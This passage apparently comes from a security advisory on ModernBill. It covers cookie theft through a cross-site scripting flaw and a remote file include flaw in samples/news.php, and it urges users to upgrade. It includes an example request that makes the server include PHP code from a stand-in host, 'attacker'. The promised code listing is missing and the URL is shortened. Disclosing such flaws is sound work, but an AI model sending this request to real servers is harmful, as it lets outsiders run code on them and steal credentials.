This vulnerability could be used to steal cookie based authentication
credentials within the scope of the current domain, or render hostile code
in a victim's browser.
Remote File Include Vulnerability:
ModernBill ships with a directory titled "samples" that resides in the
root ModernBill directory. This directory contains several files to help
users learn how to customize ModernBill to specifically fit their needs.
One of the scripts included in this directory is vulnerable to a very
dangerous remote file include vulnerability. Lets have a look at the file
// DO NOT EDIT START
If globals are set to on, and no include restrictions are in effect then
we can include any PHP code of our choice remotely. Of course the hosting
the malicious file to be included could not have php enabled, or the file
would be parsed before it reached the victim server: http://example.com/samples/news.php?...tp://attacker/
This issue is very dangerous when present, but regardless of your server
configuration you are still encouraged to upgrade immediately.
A fix for the mentioned issues has been available for quite some time now
and users should upgrade their ModernBill installations.